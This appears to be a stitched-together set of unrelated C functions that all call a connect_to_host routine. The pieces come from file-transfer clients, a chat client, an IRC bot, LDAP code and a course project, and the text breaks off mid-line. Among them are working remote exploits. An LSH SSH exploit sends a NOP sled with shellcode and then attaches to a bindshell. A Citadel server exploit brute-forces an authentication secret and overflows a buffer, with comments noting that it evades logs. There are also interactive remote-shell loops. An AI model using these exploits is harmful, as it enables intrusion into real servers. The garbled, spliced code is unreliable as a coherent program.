int irods_reli_md5( const char *host, const char *path, char *digest )
{
dataObjInp_t request;
int result;
char *str = 0;
struct irods_server *server = connect_to_host(host);
if(!server) return -1;
memset(&request,0,sizeof(request));
strcpy(request.objPath,path);
debug(D_IRODS,"rcDataObjChksum %s %s",host,path);
result = rcDataObjChksum(server->conn,&request,&str);
debug(D_IRODS,"= %d",result);
if(result<0) {
errno = irods_reli_errno(result);
return -1;
} else {
/* rcDataObjChecksum returns the checksum as ASCII */
/* but Parrot is expecting 16 bytes of binary data */
int i;
for(i=0;i<16;i++) {
digest[i] = hex_to_byte(&str[2*i]);
}
debug(D_IRODS,"%s",str);
free(str);
return 0;
}
}
int irods_reli_putfile ( const char *host, const char *path, const char *local_path )
{
dataObjInp_t request;
int result;
struct irods_server *server = connect_to_host(host);
if(!server) return -1;
memset(&request,0,sizeof(request));
strcpy(request.objPath,path);
request.numThreads = 0; // server chooses threads
request.openFlags = O_CREAT|O_WRONLY;
addKeyVal (&request.condInput, FORCE_FLAG_KW, "");
addKeyVal (&request.condInput, ALL_KW, "");
debug(D_IRODS,"rcDataObjPut %s %s %s",host,path,local_path);
result = rcDataObjPut(server->conn,&request,(char*)local_path);
debug(D_IRODS,"= %d",result);
clearKeyVal (&request.condInput);
if(result<0) {
errno = irods_reli_errno(result);
return -1;
}
return 0;
}
static int irods_reli_lseek_if_needed( struct irods_file *file, INT64_T offset )
{
openedDataObjInp_t request;
fileLseekOut_t *response=0;
int result;
struct irods_server *server = connect_to_host(file->host);
if(!server) return -1;
if(!connect_to_file(server,file)) return -1;
if(file->offset==offset) return 0;
memset(&request,0,sizeof(request));
request.l1descInx = file->fd;
request.offset = offset;
request.whence = SEEK_SET;
debug(D_IRODS,"rcDataObjLseek %s %d %lld",file->host,file->fd,(long long)offset);
result = rcDataObjLseek(server->conn,&request,&response);
debug(D_IRODS,"= %d",result);
if(result<0) {
errno = irods_reli_errno(result);
return -1;
}
free(response);
file->offset = offset;
return 0;
}
int irods_reli_pwrite ( struct irods_file *file, const char *data, int length, INT64_T offset )
{
int result;
openedDataObjInp_t request;
bytesBuf_t response;
struct irods_server *server = connect_to_host(file->host);
if(!server) return -1;
if(!connect_to_file(server,file)) return -1;
if(irods_reli_lseek_if_needed(file,offset)<0) return -1;
memset(&request,0,sizeof(request));
request.l1descInx = file->fd;
request.len = length;
response.buf = (char*)data;
response.len = length;
debug(D_IRODS,"rcDataObjWrite %s %d %d",file->host,file->fd,length);
result = rcDataObjWrite(server->conn,&request,&response);
debug(D_IRODS,"= %d",result);
if(result<0) {
errno = irods_reli_errno(result);
return -1;
}
file->offset += result;
return result;
}
int do_bind_shell()
{
fd_set rfds;
int sock,retVal,r;
if((sock=connect_to_host(BINDSHELL_PORT))==-1)
return -1;
printf("[-] Success!!! You should now be r00t on %s\n", host);
do {
FD_ZERO(&rfds);
FD_SET(0, &rfds);
FD_SET(sock, &rfds);
retVal=select(sock+1, &rfds, NULL, NULL, NULL);
if(retVal) {
if(FD_ISSET(sock, &rfds)) {
buf[(r=recv(sock, buf, SIZ-1,0))]='\0'; // bad!
printf("%s", buf);
}
if(FD_ISSET(0, &rfds)) {
buf[(r=read(0, buf, SIZ-1))]='\0'; // bad!
send(sock, buf, strlen(buf), 0);
}
}
} while(retVal && r); // loop until connection terminates
close(sock);
return 1;
}
static void CheckMissing(struct servercstruct *server) {
int delay;
if(!IsConnecting(server->sinfo)&&(server->nexttry<=currtime) ) {
if(server->server!=NULL) {
DelServer(server->server);
server->server=NULL;
}
if(botinfo->maxtries != 0 && server->conatt >= botinfo->maxtries) {
NotConnectable(server->sinfo);
return;
}
server->conatt++;
delay=CalcConDelay(server->conatt);
server->nexttry=currtime+delay;
info_log("Connecting to %s attempt %i next attempt in %i seconds\n",server->address, server->conatt, delay);
AddServer(server->sinfo, server->address, botinfo->nick);
/* convert botinfo->timout (minutes) to sinfo->timeout (seconds) */
server->sinfo->timeout=botinfo->timeout * 60;
//disconnectonidle(server->sinfo);
connect_to_host(server->sinfo,server->address,server->port);
}
}
int irods_reli_rename ( const char *host, const char *path, const char *newpath )
{
dataObjCopyInp_t request;
int result;
/* rcDataObjRename does not have the Unix semantics of atomically
destroying the target file. So, we must do it ourselves.
*/
irods_reli_unlink(host,newpath);
struct irods_server *server = connect_to_host(host);
if(!server) return -1;
memset(&request,0,sizeof(request));
strcpy(request.srcDataObjInp.objPath,path);
strcpy(request.destDataObjInp.objPath,newpath);
request.srcDataObjInp.oprType = RENAME_DATA_OBJ;
request.destDataObjInp.oprType = RENAME_DATA_OBJ;
debug(D_IRODS,"rcDataObjRename %s %s %s",host,path,newpath);
result = rcDataObjRename(server->conn,&request);
debug(D_IRODS,"= %d",result);
if(result<0) {
errno = irods_reli_errno(result);
return -1;
}
return result;
}
/*
* Get version number
*/
static gint get_version(QQInfo *info)
{
int ret = NO_ERR;
Request *req = request_new();
Response *rps = NULL;
gint res = 0;
request_set_method(req, "GET");
request_set_version(req, "HTTP/1.1");
request_set_uri(req, VERPATH);
request_set_default_headers(req);
request_add_header(req, "Host", LOGINPAGEHOST);
Connection *con = connect_to_host(LOGINPAGEHOST, 80);
if(con == NULL){
g_warning("Can NOT connect to server!(%s, %d)"
, __FILE__, __LINE__);
request_del(req);
return NETWORK_ERR;
}
send_request(con, req);
res = rcv_response(con, &rps);
close_con(con);
connection_free(con);
const gchar *retstatus = rps -> status -> str;
if (-1 == res || !rps) {
g_warning("Null point access (%s, %d)\n", __FILE__, __LINE__);
ret = -1;
goto error;
}
if(g_strstr_len(retstatus, -1, "200") == NULL){
g_warning("Server status %s (%s, %d)", retstatus
, __FILE__, __LINE__);
ret = NETWORK_ERR;
goto error;
}
gchar *lb, *rb;
gchar *ms = rps -> msg -> str;
lb = g_strstr_len(ms, -1, "(");
if(lb == NULL){
g_warning("Get version error!! %s (%s, %d)",rps -> msg -> str
, __FILE__, __LINE__);
ret = NETWORK_ERR;
goto error;
}
++lb;
rb = g_strstr_len(ms, -1, ")");
*rb = '\0';
info -> version = g_string_new(lb);
g_debug("Version: %s(%s, %d)", lb, __FILE__, __LINE__);
error:
request_del(req);
response_del(rps);
return ret;
}
struct chirp_file * chirp_reli_open( const char *host, const char *path, INT64_T flags, INT64_T mode, time_t stoptime )
{
struct chirp_file *file;
int delay=0;
time_t nexttry;
INT64_T result;
struct chirp_stat buf;
time_t current;
while(1) {
struct chirp_client *client = connect_to_host(host,stoptime);
if(client) {
result = chirp_client_open(client,path,flags,mode,&buf,stoptime);
if(result>=0) {
file = xxmalloc(sizeof(*file));
strcpy(file->host,host);
strcpy(file->path,path);
memcpy(&file->info,&buf,sizeof(buf));
file->fd = result;
file->flags = flags & ~(O_CREAT|O_TRUNC);
file->mode = mode;
file->serial = chirp_client_serial(client);
file->stale = 0;
file->buffer = malloc(chirp_reli_blocksize);
file->buffer_offset = 0;
file->buffer_valid = 0;
file->buffer_dirty = 0;
return file;
} else {
if(errno!=ECONNRESET) return 0;
}
invalidate_host(host);
} else {
if(errno==ENOENT) return 0;
}
if(time(0)>=stoptime) {
errno = ECONNRESET;
return 0;
}
if(delay>=2) debug(D_NOTICE,"couldn't connect to %s: still trying...\n",host);
debug(D_CHIRP,"couldn't talk to %s: %s\n",host,strerror(errno));
current = time(0);
nexttry = MIN(stoptime,current+delay);
debug(D_CHIRP,"try again in %d seconds\n",(int)(nexttry-current));
sleep_until(nexttry);
if(delay==0) {
delay = 1;
} else {
delay = MIN(delay*2,MAX_DELAY);
}
}
}
Error StreamPeerTCP::_connect(const String &p_address, int p_port) {
IP_Address ip;
if (p_address.is_valid_ip_address()) {
ip = p_address;
} else {
ip = IP::get_singleton()->resolve_hostname(p_address);
if (!ip.is_valid())
return ERR_CANT_RESOLVE;
}
connect_to_host(ip, p_port);
return OK;
}
INT64_T chirp_reli_close( struct chirp_file *file, time_t stoptime )
{
struct chirp_client *client;
if(chirp_reli_flush(file,stoptime) < 0)
return -1;
client = connect_to_host(file->host,stoptime);
if(client) {
if(chirp_client_serial(client)==file->serial) {
chirp_client_close(client,file->fd,stoptime);
}
}
free(file->buffer);
free(file);
return 0;
}
int irods_reli_rmdir ( const char *host, const char *path )
{
collInp_t request;
int result;
/*
Note that an irods rmdir will fail silently if you
attempt to remove a non-directory. So, first we must
examine the type and fail explicitly if it is not a dir.
*/
struct pfs_stat info;
result = irods_reli_stat(host,path,&info);
if(result<0) return result;
if(!S_ISDIR(info.st_mode)) {
errno = EISDIR;
return -1;
}
struct irods_server *server = connect_to_host(host);
if(!server) return -1;
memset(&request,0,sizeof(request));
strcpy(request.collName,path);
addKeyVal (&request.condInput, FORCE_FLAG_KW, "");
debug(D_IRODS,"rcRmColl %s %s",host,path);
result = rcRmColl(server->conn,&request,0);
debug(D_IRODS,"= %d",result);
clearKeyVal (&request.condInput);
if(result<0) {
errno = irods_reli_errno(result);
return -1;
}
return result;
}
int irods_reli_mkdir ( const char *host, const char *path )
{
collInp_t request;
int result;
struct irods_server *server = connect_to_host(host);
if(!server) return -1;
memset(&request,0,sizeof(request));
strcpy(request.collName,path);
debug(D_IRODS,"rcCollCreate %s %s",host,path);
result = rcCollCreate(server->conn,&request);
debug(D_IRODS,"= %d",result);
if(result<0) {
errno = irods_reli_errno(result);
return -1;
}
return result;
}
// 正确的关闭客户端
void client_shutdown(int sig)
{
// 设置全局停止变量以停止连接到其他peer, 以及允许其他peer的连接. Set global stop variable so that we stop trying to connect to peers and
// 这控制了其他peer连接的套接字和连接到其他peer的线程.
exit_window();
g_done=1;
int sockfd = connect_to_host(g_tracker_ip, g_tracker_port);
int request_len = 0;
char *request = make_tracker_request(BT_STOPPED, &request_len);
send(sockfd, request, request_len, 0);
free(request);
close(sockfd);
close(g_peerport);
close(listenfd);
int i;
for (i = 0; i <g_torrentmeta->filenum; i++){
if (g_torrentmeta->flist[i].fp!=NULL)
fclose(g_torrentmeta->flist[i].fp);
}
sleep(1);
exit(0);
}
int irods_reli_close ( struct irods_file *file )
{
int result;
openedDataObjInp_t request;
struct irods_server *server = connect_to_host(file->host);
if(!server) return -1;
if(!connect_to_file(server,file)) return -1;
memset(&request,0,sizeof(request));
request.l1descInx = file->fd;
debug(D_IRODS,"rcDataObjClose %s %d",file->host,file->fd);
result = rcDataObjClose(server->conn,&request);
debug(D_IRODS,"= %d",result);
free(file->host);
free(file->path);
free(file);
return 0;
}
int irods_reli_truncate ( const char *host, const char *path, INT64_T length )
{
dataObjInp_t request;
int result;
struct irods_server *server = connect_to_host(host);
if(!server) return -1;
memset(&request,0,sizeof(request));
strcpy(request.objPath,path);
request.dataSize = length;
debug(D_IRODS,"rcDataObjTruncate %s %s",host,path);
result = rcDataObjTruncate(server->conn,&request);
debug(D_IRODS,"= %d",result);
if(result<0) {
errno = irods_reli_errno(result);
return -1;
}
return 0;
}
int shell( u_long ip )
{
int fd;
int rd ;
fd_set rfds;
static char buff[ 1024 ];
fprintf(stdout,"[+] Checking if exploit worked\n");
if ( (fd=connect_to_host( ip, 30464 )) == -1 ) {
fprintf( stderr, "[-] Did not worked.\n");
return( -1 );
}
write(fd, COMMAND, strlen( COMMAND ));
while(1) {
FD_ZERO( &rfds );
FD_SET(0, &rfds);
FD_SET(fd, &rfds);
if(select(fd+1, &rfds, NULL, NULL, NULL) < 1)
return( 0 );
if(FD_ISSET(0,&rfds)) {
if( (rd = read(0,buff,sizeof(buff))) < 1)
die("shell(): read from stdin");
if( write(fd,buff,rd) != rd)
die("shell(): write to sock");
}
if(FD_ISSET(fd,&rfds)) {
if( (rd = read(fd,buff,sizeof(buff))) < 1)
die("see you next time, bye.");
write(1,buff,rd);
}
}
}
/*
* Get the psessionid.
*
* This function is the last step of loginning
*/
static int get_psessionid(QQInfo *info)
{
int ret = NO_ERR;
gint res = 0;
if(info -> ptwebqq == NULL || info -> ptwebqq -> len <= 0){
g_warning("Need ptwebqq!!(%s, %d)", __FILE__, __LINE__);
return PARAMETER_ERR;
}
Request *req = request_new();
Response *rps = NULL;
request_set_method(req, "POST");
request_set_version(req, "HTTP/1.1");
request_set_uri(req, PSIDPATH);
request_set_default_headers(req);
request_add_header(req, "Host", PSIDHOST);
request_add_header(req, "Cookie2", "$Version=1");
request_add_header(req, "Referer"
, "http://d.web2.qq.com/proxy.html?v=20101025002");
GString *clientid = generate_clientid();
info -> clientid = clientid;
g_debug("clientid: %s", clientid -> str);
gchar* msg = g_malloc(500);
g_snprintf(msg, 500, "{\"status\":\"%s\",\"ptwebqq\":\"%s\","
"\"passwd_sig\":""\"\",\"clientid\":\"%s\""
", \"psessionid\":null}"
, info -> me -> status -> str, info -> ptwebqq -> str
, clientid -> str);
gchar *escape = g_uri_escape_string(msg, NULL, FALSE);
g_snprintf(msg, 500, "r=%s", escape);
g_free(escape);
request_append_msg(req, msg, strlen(msg));
gchar cl[10];
g_sprintf(cl, "%u", (unsigned int)strlen(msg));
request_add_header(req, "Content-Length", cl);
request_add_header(req, "Content-Type"
, "application/x-www-form-urlencoded");
g_free(msg);
gchar *cookie = g_malloc(2000);
gint idx = 0;
if(info -> ptvfsession != NULL){
idx += g_snprintf(cookie + idx, 2000 - idx, "ptvfsession=%s; "
, info -> ptvfsession -> str);
}
idx += g_snprintf(cookie + idx, 2000 - idx, "%s"
, info -> cookie -> str);
request_add_header(req, "Cookie", cookie);
g_free(cookie);
Connection *con = connect_to_host(PSIDHOST, 80);
if(con == NULL){
g_warning("Can NOT connect to server!(%s, %d)"
, __FILE__, __LINE__);
request_del(req);
return NETWORK_ERR;
}
send_request(con, req);
res = rcv_response(con, &rps);
if (-1 == res || !rps) {
g_warning("Null point access (%s, %d)\n", __FILE__, __LINE__);
ret = -1;
goto error;
}
const gchar *retstatus = rps -> status -> str;
if(g_strstr_len(retstatus, -1, "200") == NULL){
g_warning("Server status %s (%s, %d)", retstatus
, __FILE__, __LINE__);
ret = NETWORK_ERR;
goto error;
}
json_t *json = NULL;
switch(json_parse_document(&json, rps -> msg -> str))
{
case JSON_OK:
break;
default:
g_warning("json_parser_document: syntax error. (%s, %d)"
, __FILE__, __LINE__);
ret = NETWORK_ERR;
goto error;
}
json_t *val;
val = json_find_first_label_all(json, "retcode");
if(val -> child -> text[0] != '0'){
g_warning("Server return code %s(%s, %d)", val -> child -> text
, __FILE__, __LINE__);
ret = NETWORK_ERR;
goto error;
}
val = json_find_first_label_all(json, "seskey");
if(val != NULL){
g_debug("seskey: %s (%s, %d)", val -> child -> text
, __FILE__, __LINE__);
info -> seskey = g_string_new(val -> child -> text);
}
val = json_find_first_label_all(json, "cip");
if(val != NULL){
info -> cip = g_string_new(val -> child -> text);
}
val = json_find_first_label_all(json, "index");
if(val != NULL){
info -> index = g_string_new(val -> child -> text);
}
val = json_find_first_label_all(json, "port");
if(val != NULL){
info -> port = g_string_new(val -> child -> text);
}
val = json_find_first_label_all(json, "status");
{
g_debug("status: %s (%s, %d)", val -> child -> text
, __FILE__, __LINE__);
}
val = json_find_first_label_all(json, "vfwebqq");
if(val != NULL){
g_debug("vfwebqq: %s (%s, %d)", val -> child -> text
, __FILE__, __LINE__);
info -> vfwebqq = g_string_new(val -> child -> text);
}
val = json_find_first_label_all(json, "psessionid");
if(val != NULL){
g_debug("psessionid: %s (%s, %d)", val -> child -> text
, __FILE__, __LINE__);
info -> psessionid = g_string_new(val -> child -> text);
}else{
g_debug("Can not find pesssionid!(%s, %d): %s"
, __FILE__, __LINE__, rps -> msg -> str);
}
error:
json_free_value(&json);
close_con(con);
connection_free(con);
request_del(req);
response_del(rps);
return ret;
}
int attempt_exploit(void) {
fd_set rfds;
int sock,retVal,r;
if(exactPointerAddy) {
printf("[-] Using 0x%08x for pointer addy\n", exactPointerAddy);
if((sock=connect_to_host(HTTP_PORT))<=0)
return sock;
magic_r=exactPointerAddy;
make_exploitbuf(buf);
my_send(sock, buf);
my_recv(sock);
close(sock);
my_sleep(100000);
if((sock=connect_to_host(SHELL_PORT))<=0) {
return sock;
}
} else { // Do crappy bruteforce loop
printf("[-] Attempting attack [ %s ] ...\n", targets[useTarget].platform);
MAGIC_R_START=targets[useTarget].bruteStart;
MAGIC_R_END=targets[useTarget].bruteEnd;
retAddr=targets[useTarget].retAddr;
for(magic_r=MAGIC_R_START; magic_r<=MAGIC_R_END; magic_r++) {
printf("[-] Trying 0x%08x ... \r", magic_r);fflush(stdout);
if((sock=connect_to_host(HTTP_PORT))<=0)
return sock;
make_exploitbuf(buf);
my_send(sock, buf);
my_recv(sock);
close(sock);
my_sleep(50000);
if((sock=connect_to_host(SHELL_PORT))>=SUCCESS) {
printf("\n[-] Found request_rec address @ 0x%08x\n", magic_r);
break;
}
}
if(magic_r>MAGIC_R_END)
return BRUTE_FORCE_EXHAUSTED;
}
printf("[-] Connected to %s! You can type commands now:\n", host);
// Now let the attacker issue commands to the remote
// shell, just as if (s)he had launched 'nc host 45295'.
do {
FD_ZERO(&rfds);
FD_SET(0, &rfds);
FD_SET(sock, &rfds);
retVal=select(sock+1, &rfds, NULL, NULL, NULL);
if(retVal) {
if(FD_ISSET(sock, &rfds)) {
buf[(r=recv(sock, buf, SIZ-1,0))]='\0'; // bad!
printf("%s", buf);
}
if(FD_ISSET(0, &rfds)) {
buf[(r=read(0, buf, SIZ-1))]='\0'; // bad!
send(sock, buf, strlen(buf), 0);
}
}
} while(retVal && r); // loop until connection terminates
close(sock);
return SUCCESS;
}
/* ARGSUSED */
int
open_ldap_connection(LDAP *ld, Sockbuf *sb, char *host, int defport,
char **krbinstancep, int async)
{
int rc, port;
char *p, *q, *r;
char *curhost, hostname[ 2*MAXHOSTNAMELEN ];
int bindTimeout;
Debug(LDAP_DEBUG_TRACE, catgets(slapdcat, 1, 196,
"open_ldap_connection\n"), 0, 0, 0);
defport = htons(defport);
bindTimeout = ld->ld_connect_timeout;
if (host != NULL) {
for (p = host; p != NULL && *p != '\0'; p = q) {
if ((q = strchr(p, ' ')) != NULL) {
(void) strncpy(hostname, p, q - p);
hostname[ q - p ] = '\0';
curhost = hostname;
while (*q == ' ') {
++q;
}
} else {
/* avoid copy if possible */
curhost = p;
q = NULL;
}
if ((r = strchr(curhost, ':')) != NULL) {
if (curhost != hostname) {
/* now copy */
(void) strcpy(hostname, curhost);
r = hostname + (r - curhost);
curhost = hostname;
}
*r++ = '\0';
port = htons((short)atoi(r));
} else {
port = defport;
}
if ((rc = connect_to_host(sb, curhost, 0,
port, async, bindTimeout)) != -1) {
break;
}
}
} else {
rc = connect_to_host(sb, NULL, htonl(INADDR_LOOPBACK),
defport, async, bindTimeout);
}
if (rc == -1) {
return (rc);
}
if (krbinstancep != NULL) {
#ifdef KERBEROS
if ((*krbinstancep = host_connected_to(sb)) != NULL &&
(p = strchr(*krbinstancep, '.')) != NULL) {
*p = '\0';
}
#else /* KERBEROS */
krbinstancep = NULL;
#endif /* KERBEROS */
}
return (0);
}
main(int argc, char **argv)
{
int ch, i, targetSock;
unsigned long *retPtr;
char *charRetPtr;
printf("LSH 1.4.x (others?) exploit by Haggis ([email protected])\n\n");
while((ch=getopt(argc, argv, "t:T:h"))!=-1) {
switch(ch) {
case 't':
strncpy(host, optarg, SIZ-1);
break;
case 'T':
useTarget=atoi(optarg);
break;
case 'h':
default:
printf("%s\n",usage);
printf("Available platforms:\n");
for(i=0;targets[i].platform;i++)
printf(" %2d. %s\n", i, targets[i].platform);
printf("\n");
exit(0);
break;
}
}
if(host[0]=='\0') {
printf("[*] You must specify a host! Use -h for help\n");
exit(1);
}
if((hostStruct=gethostbyname(host))==NULL) {
printf("[*] Couldn't resolve host %s\nUse '%s -h' for help\n", host,argv[0]);
exit(1);
}
if((targetSock=connect_to_host(SSH_PORT))==-1) {
printf("[*] Coulnd't connect to host %s\n", host);
exit(1);
}
my_recv(targetSock);
printf("[-] Building exploit buffer...\n");
retPtr=(unsigned long *)buf;
for(i=0;i<EXPLOIT_BUF_SIZE/4;i++)
*(retPtr++)=targets[useTarget].retAddr;
charRetPtr=(unsigned char *)retPtr;
for(i=0;i<NOPS_LEN-strlen(shellcode);i++)
*(charRetPtr++)=(unsigned long)0x90;
memcpy(charRetPtr, shellcode, strlen(shellcode));
*(charRetPtr+strlen(shellcode))='\n';
*(charRetPtr+strlen(shellcode)+1)='\0';
printf("[-] Sending exploit string...\n");
my_send(targetSock, buf);
close(targetSock);
printf("[-] Sleeping...\n");
my_sleep(100000);
printf("[-] Connecting to bindshell...\n");
if(do_bind_shell()==-1)
printf("[*] Could not connect to %s - the exploit failed\n", host);
exit(0);
}
int attempt_exploit(void) {
int magic;
// Connect to the host and grab the banner
printf("[-] Connecting to Citadel server (%s) on port %d\n", host, CITADEL_PORT);
if((sock=connect_to_host(host,CITADEL_PORT)) < 1)
return sock;
my_recv(sock);
// Attempt to brute-force the secret IPGM authentication number.
// Only do this if magic number is not given on command-line (-i flag).
magic=magicNumber;
if(!magic) {
printf("[-] Starting bruteforce operation ...\n");fflush(stdout);
if((magic=brute_force(sock))==-1) {
return BRUTE_FORCE_EXHAUSTED;
}
printf("[-] Success! IPGM=%d (seed: %d)\n", magic, seed);
magicNumber=magic; // set magicNumber so we don't run bruteforcer again
// Tear down the socket, and reconnect again (to reauthenticate),
printf("[-] Re-establishing connection to %s ...\n",host);
my_send(sock, "QUIT\n");
my_recv(sock);
close(sock);
if(!(sock=connect_to_host(host,CITADEL_PORT)))
return sock;
}
// Authenticate as internal program, but unlike the brute-force attempts,
// tag 4K of shellcode on the end of the request
printf("[-] Authenticating as internal progam ...\n");
make_shellcode(buf);
my_send(sock, "IPGM %d %s\n", magic, buf);
LOCAL_NET();
buf[recv(sock,buf,SIZ-1,0)]=0; // don't do this at home, kids!
if(strncmp(buf, "200",3)) {
return INCORRECT_IPGM_SECRET;
}
// Increase the chance of the shellcode being in the correct place at the
// correct time by sending it many times... this lets each worker thread
// in Citserver copy the shellcode into a buffer, making it almost
// certain that we can jump to it successfully (it hasn't failed once!)
// Shellcode is stored in a buffer that is used by Citserver to hold
// text that would normally get logged to stderr. As Citserver usually
// runs as a daemon, this exploit doesn't show in any logs at all.
increase_chances(sock,magic);
// Enter configuration import mode, specifically the 'floor' section,
// although I think others may be vulnerable too
printf("[-] Entering config mode ...\n");
my_send(sock, "ARTV import\n");
my_recv(sock);
my_send(sock, "floor\n");
// Start the vulnerable import process which blindly reads in 6 lines of
// data. These lines are read into buffers 4K in size, and the data is
// also truncated at 4K... Unfortunately, the 3rd line goes into a 256
// byte buffer which, of course, overflows..
printf("[-] Sending exploit strings ...\n");
my_send(sock, "a\n");
my_send(sock, "a\n");
// Overflow occurs when this buffer is read by the server, so make sure
// it's padded to the correct size with the evil RET address tagged on
// the end.
make_exploitbuf(buf);
my_send(sock,buf);
// Send the final 3 lines of text. It can be anything we like...
make_shellcode(buf);
for(i=0;i<3;i++)
my_send(sock,buf);
// The server will now have RETurned to the new, malicious saved EIP and
// is executing the shellcode... We close the connection, wait a couple of
// seconds and then connect to the shell which is bound to port 45295.
close(sock);
printf("[-] Waiting before connecting to shell...\n");
sleep(2);
printf("[-] Now connecting to shell...\n");
if(!(sock=connect_to_host(host,SHELL_PORT))) {
return SHELL_NOT_FOUND;
}
printf("[-] Connected! You can type commands now:\n");
// Now let the attacker issue commands to the remote
// shell, just as if (s)he had launched 'nc host 45295'.
do {
FD_ZERO(&rfds);
FD_SET(0, &rfds);
FD_SET(sock, &rfds);
retVal=select(sock+1, &rfds, NULL, NULL, NULL);
if(retVal) {
if(FD_ISSET(sock, &rfds)) {
buf[(r=recv(sock, buf, SIZ-1,0))]='\0'; // bad!
printf("%s", buf);
}
if(FD_ISSET(0, &rfds)) {
buf[(r=read(0, buf, SIZ-1))]='\0'; // bad!
send(sock, buf, strlen(buf), 0);
}
}
} while(retVal && r); // loop until connection terminates
// Be an environmentally friendly programmer and free resources before exiting...
close(sock);
return 1;
}
static gint do_logout(QQInfo *info, GError **err)
{
gint ret_code = 0;
gint res = 0;
g_debug("Logout... (%s, %d)", __FILE__, __LINE__);
if(info -> psessionid == NULL || info -> psessionid -> len <= 0){
g_warning("Need psessionid !!(%s, %d)", __FILE__, __LINE__);
return -1;
}
gchar params[300];
Request *req = request_new();
Response *rps = NULL;
request_set_method(req, "GET");
request_set_version(req, "HTTP/1.1");
g_sprintf(params, LOGOUTPATH"?clientid=%s&psessionid=%s&t=%ld"
, info -> clientid -> str
, info -> psessionid -> str, get_now_millisecond());
request_set_uri(req, params);
request_set_default_headers(req);
request_add_header(req, "Host", LOGOUTHOST);
request_add_header(req, "Cookie", info -> cookie -> str);
request_add_header(req, "Referer", REFERER);
Connection *con = connect_to_host(LOGOUTHOST, 80);
if(con == NULL){
g_warning("Can NOT connect to server!(%s, %d)"
, __FILE__, __LINE__);
request_del(req);
return -1;
}
send_request(con, req);
res = rcv_response(con, &rps);
close_con(con);
connection_free(con);
if (-1 == res || !rps) {
g_warning("Null point access (%s, %d)\n", __FILE__, __LINE__);
ret_code = -1;
goto error;
}
const gchar *retstatus = rps -> status -> str;
if(g_strstr_len(retstatus, -1, "200") == NULL){
/*
* Maybe some error occured.
*/
g_warning("Resoponse status is NOT 200, but %s (%s, %d)"
, retstatus, __FILE__, __LINE__);
ret_code = -1;
goto error;
}
json_t *json = NULL;
switch(json_parse_document(&json, rps -> msg -> str))
{
case JSON_OK:
break;
default:
g_warning("json_parser_document: syntax error. (%s, %d)"
, __FILE__, __LINE__);
ret_code = -1;
goto error;
}
json_t *retcode, *result;
retcode = json_find_first_label_all(json, "retcode");
result = json_find_first_label_all(json, "result");
if(retcode != NULL && result != NULL){
if(g_strstr_len(result -> child -> text, -1, "ok") != NULL){
g_debug("Logout ok!(%s, %d)", __FILE__, __LINE__);
ret_code = 0;
}
}else{
g_debug("(%s, %d)%s", __FILE__, __LINE__, rps -> msg -> str);
}
json_free_value(&json);
error:
request_del(req);
response_del(rps);
return ret_code;
}
int main(int argc, char **argv) {
program_name = basename(argv[0]);
snprintf(doc,DOC_BUFFER_LEN,"%s -- a simple client for COMP-535",program_name);
struct arguments arguments;
/* Default values. */
arguments.port = -1;
arguments.host = NULL;
arguments.adaptive = 0;
arguments.verbose = 0;
arguments.silent = 0;
arguments.batch = 0;
arguments.devnull = 0;
arguments.infile = NULL;
argp_parse (&argp, argc, argv, 0, 0, &arguments);
verbose_f = 0;
if (arguments.verbose)
verbose_f = 1;
if (arguments.silent) {
freopen("/dev/null", "w", stderr);
freopen("/dev/null", "w", stdout);
}
batch_f = arguments.batch;
adaptive_f = arguments.adaptive;
if (arguments.infile) {
if(freopen(arguments.infile, "r", stdin) == NULL){
exit(1);
}
}
sockfd = -1;
if (adaptive_f)
adaptivefd = -1;
signal(SIGINT, interrupt);
char foldertmp[] = "clientimgXXXXXX";
char s[INET6_ADDRSTRLEN], *t, *line, linebuf[LINE_SIZE];
char *filename, *filebuf;
int cid, l; /* Return values, temp values */
FILE *file;
size_t filesize, read, remain, total, chunk;
sockfd = connect_to_host(arguments.host, arguments.port, s, sizeof s);
if (sockfd == -1) {
fprintf(stderr, "failed to connect to server.\n");
global_exit(1);
}
fprintf(stdout, "Connected to %s\n", s);
buffer = ALLOC(readbuffer);
buffer->used = 0;
// HELLO YES THIS IS SERVER
line = recvline();
t = strtok(line,DELIM);
if (strcmp(t, "HELLO") != 0){
fprintf(stderr,"Unexpected message from server: %s\nExiting.\n", line);
global_exit(0);
}
t = strtok(NULL,DELIM);
cid = (int)strtol(t,NULL,0);
if (errno == ERANGE) { /* Not a number? or number too big? */
fprintf(stderr, "Invalid client ID from server. Exiting");
global_exit(1);
}
fprintf(stdout, "Got client ID: %d\n", cid);
if (adaptive_f) {
if ((t = strtok(NULL,DELIM)) == NULL){
fprintf(stderr, "Server is not in adaptive mode. Exiting\n");
global_exit(1);
}
errno = 0;
l = (int)strtol(t,NULL,0);
if (errno == ERANGE) { /* Not a number? or number too big? */
fprintf(stderr, "Invalid port number from server. Exiting");
global_exit(1);
}
adaptivefd = connect_to_host(arguments.host, l, NULL, 0);
if (adaptivefd == -1) {
fprintf(stderr, "failed to connect to adaptive server.\n");
global_exit(2);
}
snprintf(linebuf, LINE_SIZE, "%d\n", cid);
if (send(adaptivefd, linebuf, strlen(linebuf), 0) == -1){
perror("send");
global_exit(1);
}
}
efree(line);
if (!arguments.devnull){
mkdtemp(foldertmp);
fprintf(stdout, "Storing downloaded images in directory %s.\n", foldertmp);
}
for (;;) {
#ifdef HAS_GNUREADLINE
if(snreadline(linebuf, LINE_SIZE, "GET> ") == NULL){
#else
if (!batch_f)
fprintf(stderr, "GET> ");
if(fgets(linebuf, LINE_SIZE, stdin) == NULL){
#endif
printf("exit\n");
global_exit(0);
}
#ifndef HAS_GNUREADLINE
trim_in_place(linebuf);
#endif
if (strlen(linebuf) == 0) continue;
/* Hacky hack to transmit panning speed, any 2 or less digit
number is considered a pan speed */
if (adaptive_f && strlen(linebuf) < 3 && is_number(linebuf)) {
add_newline(linebuf, LINE_SIZE);
if (send(adaptivefd, linebuf, strlen(linebuf), 0) == -1){
perror("send");
global_exit(1);
}
continue;
}
if (add_newline(linebuf, LINE_SIZE)) {
fprintf(stderr, "Command too long.\n");
continue;
}
if (send(sockfd, linebuf, strlen(linebuf), 0) == -1){
perror("send");
global_exit(1);
}
remove_newline(linebuf);
line = recvline();
t = strtok(line,DELIM);
if (strcmp(t, "ERROR") == 0){
t = strtok(NULL,DELIM);
fprintf(stderr, "Server> Error: %s\n", t);
} else if (strcmp(t, "FILE") == 0) {
t = strtok(NULL,DELIM);
errno = 0;
size_t filesize = (size_t)strtol(t,NULL,0);
if (errno == ERANGE) {
fprintf(stderr,"Fatal Error: Could not parse file size.\n", t);
global_exit(0);
}
if (!arguments.devnull) {
l = snprintf(NULL, 0, "%s/%s", foldertmp, linebuf);
